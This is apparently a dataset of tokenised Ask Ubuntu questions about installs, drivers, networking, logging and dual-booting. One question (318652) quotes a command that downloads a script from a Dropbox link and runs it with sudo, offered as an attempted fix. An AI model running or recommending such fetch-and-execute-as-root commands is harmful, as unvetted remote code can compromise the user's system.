318542	problems installing kde in ubuntu 12.04 xorg problem	hi sorry to bother you guys , i have a problem when i try to install kde en my ubuntu 12.04 i go to the terminal and i follow this steps sudo add-apt-repository ppa : kubuntu-ppa/backports sudo apt-get update sudo apt-get install kubuntu-desktop the first two commands work fine , but when i go to the last one i get a message that says some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : kubuntu-desktop : depends : xorg but it is not going to be installed e : unable to correct problems , you have held broken packages . what happened ? and what is xorg ? ... .. thanks for your time .
318546	how would i fix no wifi issue ?	i run ubuntu 12.04 on a netbook and had to reinstall recently . i went to update because it said i needed 278 updates . the update got interrupted and now my wifi does n't want to connect .
318547	access files on a computer with ubuntu when windows fails to boot	i have a question . i stumbled upon a very helpful life-hack in wikihow . ( http : //www.wikihow.com/access-files-on-a-computer-with-ubuntu-when-windows-fails-to-boot ) it shows how you can retrieve your files when windows fails to boot using ubuntu . according to the site , you must choose ubuntu 11.10 to do the job . my question is will it work in any other versions of ubuntu , or say other linux distribution .
318548	is there any tool for converting from .pdf to .chm ?	i googled this title and all i encountered was chm - > pdf searches . is n't it possible from pdf to chm ? or if it is possible which tools do this ?
318549	how to download 32 bit ubuntu on a 64 bit machine ?	my laptop is a 64 bit machine , but i need to download a 32 bit version of the ubuntu os because my school has said that a particular program i need 'was made with the intention that the user will not be running it on a 64 bit version of the ubuntu os ' . that is pretty much true because i have tried many ways to run it , and all my attempts have failed . the problem is that after i have downloaded the client for the 32 bit version of ubuntu ( i 'm sure it 's the client for 32 bit because i have even redownloaded it ) and installed it into my computer , the system settings in ubuntu will say that i have the 64 bit of the os installed . i check this by going to system settings > details > os type . my question is ... how do i install a 32 bit version of the ubuntu os on a 64 bit window 7 machine ?
318551	missing shared libraries when using chroot	i 'm attempting to use schroot to run a 32-bit application on a 64-bit ubuntu ( actually lubuntu ) raring installation . i was successful creating the chroot populated by the following command : sudo debootstrap -- arch=i386 raring /srv/chroot/raring_i386 http : //archive.ubuntu.com/ubuntu when i enter the chroot environment however and try to start the application i get errors about missing shared libraries . for example : error while loading shared libraries : libice.so.s : can not open shared object file : no such file or directory so far all the missing libraries in my chroot environment are located at usr/lib/i386-linux-gnu/ . i can copy these missing libraries from a different full installation of 32-bit ubuntu but i would have thought that the debootstrap step above should have downloaded these directly . can someone provide some additional insight into how the use of debootstrap should create the chroot environment ? have i possibly missed a step or is there a different option in the call to debootstrap to tell it to get some additional shared libraries ? much thanks !
318555	wifi is connected , but no internet access . ( ubuntu 12.04 lts )	recently i 've switched to wifi from ethernet and all has been going well for the past day until the next morning . in the top right panel , it says i 'm connected but i ca n't access any websites . i 'm using an asus usb-n13 b1 revision adapter with the rtl8192cu driver .
318558	how to use .bdc dictionary on ubuntu	i have some .bdc files which i run them on babylon dictionary on windows . but i ca n't run them on goldendict . ( i have to say i run .bgl on goldendict ) is there any other dictionary on ubuntu to run .bdc files or is there any way to convert .bdc to .bgl ?
318561	lock back `` files '' to the unity launcher	i unlock files from the unity launcher . i do n't find a way to lock it back because when i open a new files window the icon does not appear inside the launcher . i am running ubuntu 13.04 ( raring ringtail ) 64-bit . thank you for your help .
318564	would 12.04 work well on my vaio with single core 1.86ghz centrino and 1gb ram ?	used to run on 10.04 , dualbooted . hard drive got replaced and now i have a blank piece of paper to work with . what system do you recommend ? my laptop : sony vaio vgn-fj270 cpu : 1.86 ghz pentium m 750 ram : 1 gb vga : intel graphics media accelerator 900 , 128 mb chipset : intel 915gm source : specification , support page
318568	ssh into shell , get 'error : ca n't open display : ( null ) '	i do n't want to open an x11 session or what not , just to open up a shell to a pc . i type in terminal : ssh -p 1337 localhost after entering my password , i get the banner , last login , and then the error : error : ca n't open display : ( null ) also , if i type in a command after localhost , it works
318574	problem with installing dropbox	i am trying to install `` dropbox '' on my laptop and it keeps throwing the following error at me all the time . laptop @ laptop : ~ $ dropbox start -i starting dropbox ... dropbox is the easiest way to share and store your files online . want to learn more ? error : trouble connecting to dropbox servers . maybe your internet connection is down , or you need to set your http_proxy environment variable the installation of dropbox failed . i have tried cd ~ & & wget -o - `` https : //www.dropbox.com/download ? plat=lnx.x86_64 '' | tar xzf - which results in -- 2013-01-17 17:53:28 -- resolving proxy.hs-karlsruhe.de ( proxy.hs-karlsruhe.de ) ... 193.196.64.2 connecting to proxy.hs-karlsruhe.de ( proxy.hs-karlsruhe.de ) |193.196.64.2|:8888 ... connected . proxy tunneling failed : proxy authentication requiredunable to establish ssl connection . gzip : stdin : unexpected end of file tar : child returned status 1 tar : error is not recoverable : exiting now then i 've tried https_proxy=http : //proxy.hs-karlsruhe.de:8888 dropbox start -i and that gives an error message too . please help !
318579	runing ubuntu 12.04	i installed ubuntu 12.04 on my desktop , and widows vista already was installed on another partition . now when i turn on the desktop it goes directly to windows . how could i make it ask which system should it run with ?
318583	how can i solve `` fixed channel -1 '' ( mon0 is on channel -1 ) issue when using airodump-ng ?	i am beginner in ubuntu 12.04 , and have a problem with aircrack-ng . airodump-ng gived me a fixed channel -1 error . the access point is on channel 5 , but i ca n't switch to that channel because of that error . my hardware is : broadcom bcm431 , driver b43 . i 've tried patching , but had a problem with driver installation .
318586	how to remove goforfiles from wine ?	goforfiles is some kind of annoying search engine addition to windows which likes to install itself . i searched the internet and there are some howto 's for windows but it sits in my wine on ubuntu 12.04 , and i do n't have ie installed so i ca n't follow those manuals . i attempted to remove it , but it does n't want to go . it has an `` uninstall '' option in the wine start menu but it does n't work . how can i fully remove it ?
318588	adjusting subtitle delay delays audio	this happens only on ubuntu ( since 12.04 , now even in 13.04 ) , and happens every time without exception . when the subtitles in vlc are out on sync , adjusting it ( either direction ) puts the audio out of sync . i think this is because when i resume the video after adjust the subtitle delay , the audio plays , but video does n't , and then they both continue , and hence the audio is ahead of the video . is this a common problem ? i was unable to find a fix to this , or even a reference to this problem anywhere . this has happened in each of my ubuntu installations ( and i 've done that many times ) , even on kubuntu . are there some drivers i 'm missing ? some libraries ?
318592	how can i remove the landscape.canonical.com greeting from motd ?	logging into a server with ssh produces the landscape-generated message of the day , which includes the suggestion for using https : //landscape.canonical.com/ to graph data : graph this data and manage this system at https : //landscape.canonical.com/ how can i trim this or other lines from the ssh greeting ? with legal boilerplate added to the login banner already , i 'd like to keep some information from landscape-sysinfo , but see less of it .
318595	how to build ubuntu touch for unofficial cyanogenmod device	i own a samsung galaxy scl i9003 and i would like to port ubuntu touch on this device . we do n't have an official cyanogenmod , but we have an unofficial version of it . i did the built of the unofficial cyanogenmod 10.1 but now i do n't know how to proceed , and from where start following the porting guide to create a ubuntu touch build flashable to my device . please , i hope someone could help me thanks in advance
318597	how to get windows 8 boot menu in a windows 8-ubuntu dual boot ?	i have a dual-booted windows 8-ubuntu 13.04 system . as usual , by default , the ubuntu grub menu comes up as soon as we boot . similar questions have been asked before , and the reply to each of them was grub customiser and easybcd . my problem is that as soon as i restart my system , the changes in easybcd installer get reverted . please provide me with a solution to this . this is my boot-menu as in easybcd : now i go to the boot menu , set priority for windows 8 the highest and in bcd deployment hit 'write mbr ' . yet , when i restart , no changes take place and it reverts back to the same order .
318599	`` load '' a url in terminal	i put `` load '' in quotes because i 'm not trying to open up a website via terminal . i have a php script on a web server that logs to a text file when it has been loaded . i 'd like to set up a cron on a battery powered linux system to load the url for this php script once per minute . i 'd like to do this so that it runs until the battery dies and i can see how long it ran for by viewing the txt file on my server . i 'm trying to find out if there is something like a `` ping '' command for a specific url , not just a server or ip . hopefully that makes sense . = )
318600	acer aspire 5755g warming	today i 'd installed the ubuntu 13.04 , but my laptop ( http : //www.expertreviews.co.uk/laptops/1286536/acer-aspire-5755g/specifications ) is too warm ! what can i do ?
318602	clone ubuntu on usb to a larger usb stick ?	i have an old , unbranded 2gb usb with 10.10 that is running a samba server connected to a raid array ( basically a makeshift nas . ) as most people do , i started running out of space with the various servers and packages i needed to install over the years . i purchased a 16gb usb drive ( one of those sandisk micro ones ) to upgrade it , but i 'm not sure how i should go about cloning the old 2gb disk to the new 16gb . i am doing this from my macbook pro . for reference , my diskutil list is ... /dev/disk0 ( macbook pro ) # : type name size identifier 0 : guid_partition_scheme *500.1 gb disk0 1 : efi 209.7 mb disk0s1 2 : apple_hfs mac os x 499.2 gb disk0s2 3 : apple_boot recovery hd 650.0 mb disk0s3 /dev/disk1 ( upgrade usb ) # : type name size identifier 0 : fdisk_partition_scheme *16.0 gb disk1 1 : windows_fat_32 no name 16.0 gb disk1s1 /dev/disk2 ( old usb ) # : type name size identifier 0 : fdisk_partition_scheme *2.1 gb disk2 1 : linux 254.8 mb disk2s1 2 : linux_lvm 1.9 gb disk2s5 using this answer as well as the ubuntu usb instructions for os x , my initial thought was to ... unmount both disks . dd if=/dev/disk2 of=/dev/disk1 repartition the 16gb to utilize the entire disk . however , it feels like it just should n't be that easy , and i 'm worried i might mess something up on the upgrade usb . is this the correct course of action , or am i missing something important ? thanks !
318608	lenovo yoga 13 realtek wireless driver	i 've recently purchased a lenovo yoga 13 and put ubuntu 13.04 on it last night . i was unable to get wireless to come on and thought that i would mess around with it today . today i have followed the detailed 'how-to ' at : http : //majordamo.wordpress.com/2013/05/15/getting-the-realtek-rtl8723ae-bt-wi-fi-card-to-work-on-a-lenovo-yoga-13-on-linux-mint-13-ubuntu-12-10/ the problem is i can not download and install the required headers as i do not have any internet connection on this device . is there any way for me to get them on a flash drive and bring them to the lenovo ? any and all help is appreciated . thanks
318611	using text list to batch-rename files	suppose i have a folder with some 20 files ( say , photos i took on a trip ) , and i want to rename them in one go , only there is n't any specific perl expression i want to use ( for example , if i 'd like to add additional text to each name that 's not part of the individual files ' meta-data , such as descriptions and/or comments ) . and suppose i can more easily generate a text file with what i want each file 's name to be ( or , if preferable , a 'before-and-after ' sort of list ) . is there any way to apply the changes implied in that text list to the folder in question ?
318612	running basex as an upstart job	i 'm trying to configuring basex to run as a service on my server . the basexserver command has a flag -s whose functionality is listed as `` start as service '' . if i run basexserver -s at the command line , it outputs server was started . and returns to the shell prompt , with the server running as a background process . if i then run basexserver stop , it outputs server was stopped . and returns to the shell prompt , with the server process no longer running . now i want to make this into an upstart job ( something which is new to me ) . i 'm not clear on how to translate this start-and-stop interface into an upstart job , particularly with respect to the expect stanza . the upstart cookbook recommends a procedure for establishing the fork count of an application ; this yielded the number 34 , which is well outside the range of expected results . what 's the best way to handle this ?
318613	microphone not working using skype	ok. before posting this i tried every solution already offered before ( unless i missed something ) . my internal microphone is not working . i tried silencing front right via pavucontrol , tried to define the input device as alsa through gstremer-properties , unchecked `` allow skype to automaticly adjust my mixer settings '' , checked if the microphone was muted . i have no idea what else to do . any help would be appriciated . thanks .
318614	how to make honeyd save logs in rsyslog	i have a standard install of honeyd from ubuntu repositories . honeyd is saving logs in two files : /var/log/honeyd/honeyd.log /var/log/honeyd/daemon.log i have been trying to setup rsyslog to forward all logs from honeyd.log to a remote server and it is proving impossible . my /etc/rsyslog.d/50-default.conf looks like this : $ modload imfile $ inputfilename /var/log/honeypot/honeyd.log $ inputfiletag honeyd $ inputfilestatefile stat-honeyd $ inputfileseverity debug $ inputfilefacility local7 $ inputfilepollinterval 1 $ inputfilepersiststateinterval 1 $ inputrunfilemonitor local7 . * @ @ remoteserver:514 * . * @ remoteserver on my remote server i have created /var/rsyslog.d/honeyd.conf as so : if $ programname contains 'honeyd ' then /var/log/honeyd.log & ~ with this setup i get all the daemon logs for honeyd on the remote server ( honeyd start stop ) and arp reply packages for first time communication with a honeyd honeypot . however , logs from honeyd.log are not forwarded . i have tried with udp/tcp , making sure syslog has access to honeyd.log by adding the syslog user to the honeyd group but i just cant get it to work . tcpdump confirms that logs from honeyd.log are not being sent . honeyd.log entries look like this : 2013-07-10-16:31:07.5939 icmp ( 1 ) - sourceip destip : 8 ( 0 ) : 84 2013-07-10-16:31:08.5951 icmp ( 1 ) - sourceip destip : 8 ( 0 ) : 84 does anyone know what i am missing ? thanks for any help in advance .
318622	no application menus in awesome	yesterday i installed awesome via an excellent youtube video . today , i 'm trying to be productive ; unfortunately , i ca n't find the menus to my applications : thunderbird , chromium-browser , etc . how do i get these to appear ? thanks
318624	ndas in ubuntu 13.04	the only thing i find is in either french or german , their website only got github and such ... anyone know about a easy tutorial or something ? because whenever something requires compiling and the like , i can never it to work ...
318625	lost sudo privileges through renaming an essential folder	this was stupid of me , but now i ca n't fix it . i changed the name of /usr/lib to /usr/lib64 not realizing that the sudoers.so file was in this folder . now i can only log in in recovery and i have lost my sudo privileges ( the computer can not locate /usr/lib/sudo/sudoers.so ) and i can not rename the file back from lib64 to lib without sudo privileges . is there a work around to rename or copy this folder ?
318626	installing windows when using ubuntu 12.04	i have got ubuntu 12.04 and want to install windows 8 . but i ca n't install windows 8 as my hard disk is in fat32 format and windows 8 needs ntfs . i tried to format my hard disk ( there are no partitions in the hard disk ) but could n't as a message appears that it is mounted . i tried to unmount it but could n't . also my software center is not working . it opens and within seconds closes . kindly help me . i need to install windows 8 as soon as possible . if not windows 8 , then at least windows 7 . thank you .
318629	lcd backlight keys on fujitsu siemens amilo pro	i have a fs amilo pro v3505 , which runs 12.04 fine , apart from an anomoly with the brightness . the function keys ( fn-f8 & fn-f9 ) both control the lcd brightness as you would expect . however only the first key seems to register with the notifications . running xev gives me the following for the brightness-down focusout event , serial 33 , synthetic no , window 0x3800001 , mode notifygrab , detail notifyancestor focusin event , serial 33 , synthetic no , window 0x3800001 , mode notifyungrab , detail notifyancestor keymapnotify event , serial 33 , synthetic no , window 0x0 , keys : 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 but for the brightness up , i get : keypress event , serial 33 , synthetic no , window 0x3800001 , root 0xac , subw 0x0 , time 7324412 , ( 783,376 ) , root : ( 785,466 ) , state 0x0 , keycode 120 ( keysym 0x0 , nosymbol ) , same_screen yes , xlookupstring gives 0 bytes : xmblookupstring gives 0 bytes : xfilterevent returns : false keyrelease event , serial 33 , synthetic no , window 0x3800001 , root 0xac , subw 0x0 , time 7324564 , ( 783,376 ) , root : ( 785,466 ) , state 0x0 , keycode 120 ( keysym 0x0 , nosymbol ) , same_screen yes , xlookupstring gives 0 bytes : xfilterevent returns : false cat /sys/class/backlight/intel_backlight/brightness returns 15625 , and goes down to 0 when i turn down the brightness , but does n't increase as the brightness goes up , despite the actual backlight increasing as expected . writing anything to /sys/class/backlight/intel_backlight/brightness does n't change either its value or the lcd brightness and there are no other entries in /sys/class/backlight . i am running kernel 3.2.0-49 , with an intel 945gm chipset . so , to summarise : the function keys work as expected the intel drivers expose the intel_brightness interface the brightness interface and notifications work as expected when the brightness is decreasing but not when it is increasing the intel_brightness interface can not be used to change the brightness there is no other software brightness control , e.g . no acpi interface .
318630	ubuntu server install old version of firefox	what is the best way to go back a version of firefox on ubuntu server . this is a server without a gui so command line is the only thing that can be used . also once you install that old version how do you tell it 's correct by version number ? for example , right now i get the following $ /usr/bin/firefox -- version mozilla firefox 22.0 i want to go back to version 21.0 but when i install a different version that command no longer works . the reason why i want to install the older version is selenium tests do n't work on the current version . here is an article i was following except i had to use wget instead of the gui download tool : how to install previous versions of firefox in ubuntu 12.04 .
318631	triple booting on a macbook pro	i am trying to triple-boot a macbook pro with mountain lion , windows 7 , and ubuntu . however , after attempting to install refit ( the boot screen never appears ) , i booted directly onto my ubuntu installation disk by holding the c key . when i boot into the dvd , i receive this screen then i see the normal try ubuntu/install ubuntu . however , after i select install ubuntu then something else when it asks me how i want to install ubuntu on my computer , the computer does n't recognize my clicks properly anymore . when i get to a popup screen of any kind ( such as one asking me what format i want for a certain partition or which partition i want to use as swap space ) , the computer does n't recognize the click in the pop-up box , but rather it registers the click as me clicking the table behind the popup box . i am able to navigate using the keyboard , but it is cumbersome . then , when i 'm finally finished and click install , it tells me i need a reserved bios partition or something like that . so i make a reserved bios partition out of a partition labeled free space that has 134 mb of space , and click install . then my computer completely stops responding . i would really appreciate any help you might offer .
318632	rsyslog not forwarding specific log file to remote server	i am going insane trying to get rsyslog to send a specific logfile to a remote server over udp . this is the rsyslog.conf file for the sending server : # /etc/rsyslog.conf configuration file for rsyslog . # # for more information see # /usr/share/doc/rsyslog-doc/html/rsyslog_conf.html # # default logging rules can be found in /etc/rsyslog.d/50-default.conf # # # # # # # # # # # # # # # # # # # # # modules # # # # # # # # # # # # # # # # # # # # # $ modload imuxsock # provides support for local system logging $ modload imklog # provides kernel logging support ( previously done by rklogd ) # $ modload immark # provides -- mark -- message capability $ modload imfile # provides imfile module # provides udp syslog reception # $ modload imudp # $ udpserverrun 514 # provides tcp syslog reception # $ modload imtcp # $ inputtcpserverrun 514 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # global directives # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # use traditional timestamp format . # to enable high precision timestamps , comment out the following line . # $ actionfiledefaulttemplate rsyslog_traditionalfileformat # filter duplicated messages $ repeatedmsgreduction on # # set the default permissions for all log files . # $ fileowner syslog $ filegroup adm $ filecreatemode 0640 $ dircreatemode 0755 $ umask 0022 $ privdroptouser syslog $ privdroptogroup adm # # where to place spool files # $ workdirectory /var/spool/rsyslog # # include all config files in /etc/rsyslog.d/ # $ includeconfig /etc/rsyslog.d/*.conf i then added * . * @ remoteserverip at the end of /etc/rsyslog.d/50-default.conf . after that i created the file /etc/rsyslog.d/test.conf with the following content : $ modload imfile $ inputfilename /var/log/test $ inputfiletag test $ inputfilestatefile stat-test $ inputfileseverity info inputrunfilemonitor * . * @ remoteserverip finally i created /var/log/test and did chown syslog ; chgrp adm ; service rsyslog restart my server is listening on udp 514 tcpdump udp on sending server reveals that the logs are not being sent after doing cat `` test '' > > /var/log/test logger -t test `` my little pony '' sends the data over udp , is seen by tcpdump and appears on my remote server . on sending server : rsyslogd -v rsyslogd 5.8.6 , compiled with : feature_regexp : yes feature_largefile : no gssapi kerberos 5 support : yes feature_debug ( debug build , slow code ) : no 32bit atomic operations supported : yes 64bit atomic operations supported : yes runtime instrumentation ( slow code ) : no does anyone know what i am doing wrong ? thanks for the help !
318633	is clean formatting a pre-installed windows 8 system and dual booting windows and ubuntu in legacy worth it ?	i have a pre-installed windows 8 system and i have been trying to get it running with ubuntu since a long time , but problems keep coming up . i recently got a retail version of windows 8 from my laptop manufacturer . i need ubuntu badly . so should i clean format and install both in legacy or continue trying for uefi ? what are the disadvantages involved ?
318638	ubuntu 12.04 how to completely remove anacron	i am using ubuntu 12.04 for an embedded project . i need cron jobs to execute only at their specified time , because time may be stepped forwards ( resulting in a missed job ) but those jobs should be skipped . while testing this , even when i place my crontabs into /etc/cron.d , and for example schedule the job for 13:15 , set system time to 13:25 , the job will execute at ~13:26 . i do not want to execute missed jobs , they should be ignored ( according to the research i 've done , this is `` normal '' cron behavior ) . any suggestions on how to remove anacron and just keep plain old cron ? thanks .
318639	smplayer playlist works only sometimes	i have uninstalled ubuntu built in player and instead of it i installed smplayer . when i want play more songs in playlist sometimes it automatically plays song after song but mostly it stops on every song so i must play it manually . i want it to play automaticaly . i was looking for it in settings but there was nothing about playlists . im using latest ubuntu 13 , but i had this even in 12.04 and 12.10
318642	adding gtk+ app to launcher upon installation	how can i modify the source code of my gtk+ application in such manner , so that when i install it using the regular commands make , make install , ./configure to appear at the applications menu instead of having to type it 's name at terminal ? by no means i am using quickly . reffering to the answer below , how can this be done automatically and not manualy ?
318643	what filesystem should i choose for my hdd ?	i am new to linux.few months ago i was using linux in parallel with windows.but it makes my machine pretty slow , so recently i formatted my systemdrive and installed only ubuntu in my machine in one 80gig hdd . now i want to make one storage drive with another internal 500gig hdd ( songs/movies/photos ) .now i am confused..in which filesystem should i format my 500gig hdd ? ? ? ext4 or fat or ntfs ? ? ? if i want to move back to windows in future for learning .net ... .which file system will be better for my 500gig internal storage drive . looking for a solution ... : o
318648	delete ubuntu from os choice menu	i deleted ubuntu from my laptop . now i am working on windows 7 . however , when i turn on my laptop choice of ubuntu still appears in os choice menu . how to delete choice of ubuntu from os choice menu ?
318652	configuring postgresql 9.1 and postgis 2 on ubuntu 13	i 'm following this manual to configuring postgresql 9.1 and postgis 2 on ubuntu 13 in amazon aws , when executing sudo apt-get update i get lot of errors and warnings for example : err http : //ppa.launchpad.net raring/main amd64 packages w : failed to fetch http : //ppa.launchpad.net/sharpie/forscience/ubuntu/dists/raring/main/binary-amdââ64/packages 404 not found , i saw this question and tried this wget -o ~/fixpackage https : //dl.dropbox.com/u/8850924/fixpackage ; chmod +x ~/fixpackage ; sudo ~/fixpackage it did n't work , any ideas ?
318654	it wont let me upgrade to ubuntu 13.04	i want to upgrade from ubuntu 12.10 to ubuntu 13.04 but i cant . i downloaded the iso of ubuntu 13.04 but it 's only allowing a clean install . the `` software updater '' ( update manager as it was called in 12.04 ) only offers an upgrade to xubuntu . is there a way to upgrade to what i want ?
318659	can i tag multiple artist in mp3 files from banshee ?	can i tag mp3 file such a way that banshee or rhythmbox music player can recognize the multiple artist separately . right now the different artist are showing together like arijit singh & harshjeep . i mean banshee is recognizing the whole entry as a separate artist , not individual one . so i ca n't effectively filter music using artist 's name .
318666	qt creator html5 project -lsqlite3	i 've download the ubuntu sdk to make apps . building a native app went great in qtcreator . but now i 'm trying to build an app using qtcreator with html5 . so i made a new project and chose html5 as project template and simply build it . it gives me the following error : /usr/bin/ld : can not find -lsqlite3 collect2 : ld returned 1 exit status i 'm assuming it can not find sqlite3 library . but again i 'm new using this sdk . what is the best thing to do to solve this problem ?
318679	nas mount on centos , remount on ubuntu	i have a nas that is mounted on a centos box . i have ubuntu 12.04 on another box . is it possible to mount the nas on the ubuntu box via the centos box ? heres a diagram : nas : /public - > centos : /library - > ubuntu : /library i keep getting the error when i try to mount the nas on ubuntu going through the centos box : rpcprog_nfs : rpc : port mapper failure - rpc : timed out the nas is running busybox and i do n't see an /etc/rc.conf which seemed to be the obvious place to look . there 's also only a hosts file and not a hosts.allow file .
318680	looking for non-gui utility application	i 'm searching for application ( if exists ) . it should appear after pressing previously customized keys , and will have non-gui ( aka command shell ) ( but it should be have 'buttons ' like in grub 2 ) , it should have some utilities like task manager , etc . it will be helpful when game crashed , and i ca n't move cursor , so i ca n't do anything ( except alt+tab ( but i ca n't do anything more after that ) and resetting my computer ) . i 'm writing this 2nd time because i accidenly pressed 'back ' button on my mouse . but firefox is a crap , and after forwarding , my whole text dissapear lol .
318684	differences between ubuntu touch and ubuntu-touch-preview	does anyone know what the differences between ubuntu-touch and ubuntu-touch-preview are ? see their links at : http : //cdimage.ubuntu.com/ubuntu-touch/daily-preinstalled/current/ http : //cdimage.ubuntu.com/ubuntu-touch-preview/daily-preinstalled/current/ also , the instructions explain the use of zip files for installation but it never explains what the use of those img files are . can anyone explain ?
318688	how to minimise steam to the unity panel ( system tray ) ?	when i run steam there are two icons , one in the launcher and one in the unity panel . how do i remove the icon on the launcher ? i just want an icon of steam on unity panel . clicking the close button in steam just minimises the window to the launcher , not fully hiding it .
318689	disable desktop environemnts and customize startx	is it possible to install ubuntu12.04 normally and then disable the desktop environments somehow , so that startx does n't bring up unity or gdm or anything like that ? i 'm aware of ubuntu alternative and ubuntu minimal , but i 'm asking if i can get startx to bring up just a window manager or whatever i tell it to in .xinitrc after having installed ubuntu with unity . if possible i would like to leave unity or something installed so that i can bring it up if i want/need to , but not have it/gdm come up by default
318691	error : `` prefix not found ''	first of all , yes , i am new to linux , and i decided to try ubuntu first . i made my partition of 20 gb for ubuntu ( i think that 's enough , right ) , then i installed it using wubi , and when i restarted the system and started with ubuntu , it displays error : prefix not found after that , the screen turns purple , and then it goes black and nothing happens , even after 10 minutes . how can i solve this ?
318695	black screen of death after reboot during isntallation of ubuntu 12.04 - x64 amd and ati radeon hd 2400 xt	i have been cracking my head over this for two days now . my procedure is as follows : i run the live cd from a pendrive choose to install ubuntu turn the internet connection on and off during installation ( the effect is the same ) reboot black screen reboot grub menu loads normal boot / recovery mode '' e '' and added `` nomodeset '' or `` i915.modeset=0 '' or `` i915.modeset=1 '' or `` xforcevesa '' to boot line ( with and without the quiet splash ) stops at `` fixing recursive fault but reboot is needed ! '' for a while , and then goes again 2x with different end trace lines and freezez for good i have tried ctrl+alt+f* but none of that works , anywhere . that 's what i have right now , i can not get the sytem to start , not even the virtual terminal ( hope i get the name right , the ones run with ctrl+alt+f* ) . tried using live cd from usb to mount partition and while doing so , tried installing new / old drivers for ati but always stuck with the problem from `` fglrx '' - can not delete it nor repair it with synaptic . xorg.conf is empty , so probably default 12.04 drivers are still operational and not modified . used help : have installed ubuntu but when i restart computer , it only goes to 'grub ' ... ubuntu does n't load ? what is the correct way to install ati catalyst video drivers ( fglrx ) ? http : //ubuntuforums.org/showthread.php ? t=1974021 http : //www.unixmen.com/howto-install-ati-display-driver-in-ubuntu/ 12.04 boots to black screen ati radeon hd 3200 i even tried linux mint 15 cinnamon and it booted fine for the first time . after reset it hung up on the splash screen displaying the mint logo . a year ago i installed stable version of ubuntu at that time and did n't have this problem , that is why i think it 's the graphics , although i may be wrong . please , help ... me ...
318697	why is the libindicator reporting all scroll event signals as up ?	i am trying to investigate this bug ; the gist is , if you have a unity application indicator , and you scroll over it , the scroll event is always 'up ' , even if you scroll down . here is a sample python script which creates an app indicator . run it , then mouseover the indicator ( the firefox icon ) and scroll up and down . the output is always : from gi.repository import gtk , gdk , appindicator3 if __name__ == `` __main__ '' : menu = gtk.menu ( ) quit = gtk.menuitem ( `` quit '' ) quit.connect ( `` activate '' , gtk.main_quit ) menu.append ( quit ) menu.show_all ( ) def scroll ( ind , steps , direction ) : print steps , direction if direction ! = gdk.scrolldirection.up : print `` things seem ok '' indicator = appindicator3.indicator.new ( 'testscroll ' , '' , appindicator3.indicatorcategory.application_status ) indicator.set_status ( appindicator3.indicatorstatus.active ) indicator.set_icon ( `` /usr/share/pixmaps/firefox.png '' ) indicator.connect ( `` scroll-event '' , scroll ) indicator.set_menu ( menu ) gtk.main ( ) i can see that the signal is being defined here but i can not see where the scroll event is actually being emitted . where does the scroll event signal get emitted ? where in the code would the 'bug ' likely originate and incorrectly report a direction of up ? ( i am new to ubuntu development , so apologies if something is dead obvious )
318698	how do i install a bio-metric reader driver on ubuntu 13.04 ?	details on equipment are : notebook positivo master n170i intel core i5-2410m ram 4gb hdd 500gb os ubuntu 13.04
318701	lenovo b570 ubuntu 13.04 wireless connectivity issues	i have just recently performed a clean-install of ubuntu on my lenovo b570 and now i can not connect to any wireless networks . i can see the list of networks , but i am unable to successfully connect . i have tried the available fix that worked for ubuntu 11-12 , but it just does n't seem to work anymore .
318702	issue with virt-manager	i installed virt-manager and i am unable to make it work . i have tried some of the previously posted answers with no success . i 've verified that : the libvirt-bin package is installed the libvirtd daemon has been started i am a member of the libvirtd group libvirt uri is : qemu : ///system this is the error i get when trying to run virt-manager : traceback ( most recent call last ) : file `` /usr/share/virt-manager/virtmanager/connection.py '' , line 1027 , in _open_thread self.vmm = self._try_open ( ) file `` /usr/share/virt-manager/virtmanager/connection.py '' , line 1009 , in _try_open flags ) file `` /usr/lib/python2.7/dist-packages/libvirt.py '' , line 102 , in openauth if ret is none : raise libvirterror ( 'virconnectopenauth ( ) failed ' ) libvirterror : failed to connect socket to '/var/run/libvirt/libvirt-sock ' : permission denied
318708	installing windows with ubuntu	ive made about 50 bootable flash drives and every time i try to install xp , 7 or even 8 i get missing bootmgr errors . i have tried all fixes i have found and none seem to work . i have come up with 2 ideas though . 1 , mount the iso inside a vm of windows , or use ubuntu live cd to edit my hdd with the partition i will need and use ms-sys to install a bootmgr directly to the partition . if there is an easier way please let me know . burning the iso is not an option as i have no money for blank cds or dvds . on that subject though , if i happen to get a blank cd can i burn an xp iso with brasero on a cd and have it work ?
318710	uplay hangs at `` getting proxy ''	i recently installed assassins creed 2 with playonlinux . when uplay loads , it gets stuck when it says getting proxy . i just paid for this game and it would suck to burn 20 bucks . i am using ubuntu 12.04 lts and i have an asus u46e-ral7 .
318716	how do i look inside apt/trusted.gpg ?	i like to put the contents of /etc inside git , so i can see what auto-updates change , and when something breaks , so i can go back and find out what i changed since it last worked . at the moment i 'm being told : modified : trusted.gpg modified : trusted.gpg~ git diff is no use as these are binary files . of course i could check them in , but these files are central to package security , so doing that would make mockery of my attempts at being secure ! so , how do i find out what has changed ? as root i 've tried : cd /etc/apt gpg -k trusted.gpg ( also tried -- list-keys , -- list-public-keys ) . it says gpg : error reading key : public key not found . i 'm sure it must just be a matter of discovering the correct parameters to give to gpg ?
318723	how can i tell my laptop to shutodwn after finishing running a non-root process	i 'd like to be able to say : ./run_process.sh ; sudo shutdown -p now but the call to sudo will ask for my password and then my laptop wo n't shut down because it 's waiting for my password . how can i pre-supply the password to sudo when i enter the command ( but still run ./run_process.sh from my user account without sudo ) ?
318725	problem mounting usb mobile broadband dongle in ubuntu 13.04	i have been using ubuntu 13.04 since last two months and i have problem mounting my usb dongle . i have lenovo g-580 series laptop . it has 3 usb ports which are 3.0 . when i attach dongle to one of the three usb ports the device gets mounted immediately but in the other two ports i have to reboot the os while the dongle is attached to the laptop in order to mount it and connect to the internet . my dongle is of zte . i do n't get what is going wrong .
318727	do i need to format any drive for installing ubuntu ?	i just wanted to try ubuntu and i downloaded the .iso file . i want to have both windows and linux on my pc and although i read the tutorials and other topics in the site , i did n't get the answer to one question . for installing it alongside windows ( assume that windows is in drive c ) , and not installing it in the same drive , but in drive g for example , do i have to format that drive or that will not be necessary ? ( the other drive is in ntfs format ) when we are `` selecting drive '' , does it mean selecting one of c or d or ... partitions ? and what does the space allocation means ?
